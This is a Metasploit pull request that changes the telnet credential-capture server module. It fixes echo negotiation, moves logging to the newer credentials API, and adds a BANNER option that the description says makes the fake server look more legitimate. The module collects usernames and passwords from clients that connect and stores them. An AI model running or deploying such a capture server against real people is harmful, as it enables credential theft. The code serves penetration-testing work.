### PR TITLE
Resolve https://github.com/rapid7/metasploit-framework/issues/5525 and use new creds API

### DIFF
--- a/modules/auxiliary/server/capture/telnet.rb
+++ b/modules/auxiliary/server/capture/telnet.rb
@@ -30,13 +30,18 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 23 ])
+        OptPort.new('SRVPORT', [true, 'The local port to listen on.', 23]),
+        OptString.new('BANNER', [false, 'The server banner to display when client connects'])
       ], self.class)
   end
 
   def setup
     super
     @state = {}
+  end
+
+  def banner
+    datastore['BANNER'] || 'Welcome'
   end
 
   def run
@@ -59,7 +64,6 @@ class Metasploit3 < Msf::Auxiliary
 
   def on_client_data(c)
     data = c.get_once
-
     return if not data
 
     offset = 0
@@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
         # except for echoing which we WILL control for
         # the password
 
-        reply = "\xffX#{data[x + 2].chr}"
+        reply = "\xff#{data[x + 2].chr}"
 
         if @state[c][:pass] and data[x + 2] == 0x01
           reply[1] = "\xfb"
@@ -89,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     if not @state[c][:started]
-      c.put "\r\nWelcome.\r\n\r\n"
+      c.put "\r\n#{banner}\r\n\r\n"
       @state[c][:started] = true
     end
 
@@ -106,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
     if not @state[c][:gotuser]
       @state[c][:user] = data.strip
       @state[c][:gotuser] = true
-      c.put "\xff\xfb\x01" # WILL ECHO
+      c.put "\xff\xfc\x01" # WON'T ECHO
     end
 
     if @state[c][:pass].nil?
@@ -121,21 +125,41 @@ class Metasploit3 < Msf::Auxiliary
       c.put "\x00\r\n"
     end
 
-    report_auth_info(
-      :host      => @state[c][:ip],
-      :port      => datastore['SRVPORT'],
-      :sname     => 'telnet',
-      :user      => @state[c][:user],
-      :pass      => @state[c][:pass],
-      :source_type => "captured",
-      :active    => true
-    )
-
     print_status("TELNET LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
-
     c.put "\r\nLogin failed\r\n\r\n"
-
+    report_cred(
+      ip: @state[c][:ip],
+      port: datastore['SRVPORT'],
+      service_name: 'telnet',
+      user: @state[c][:user],
+      password: @state[c][:pass]
+    )
     c.close
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   def on_client_close(c)


### PR DESCRIPTION
Resolves https://github.com/rapid7/metasploit-framework/issues/5525. This module sends telnet WONT ECHO instead of WILL ECHO. This option is compatible with both Windows telnet client (tested with Putty) and Linux built-in telnet client.
Verification
- Start telnet capture module:

``` ruby
msf > use auxiliary/server/capture/telnet
msf > run
```
- Connect from Putty telnet client from a Windows machine and enter the credentials
- Connects from a Linux built-in client and enter the credentials
- Do: run the creds command and make sure creds are properly stored in the creds DB.

Further, this PR also adds a BANNER datastore option to display customize banner in order make the msf server more legitimate. 
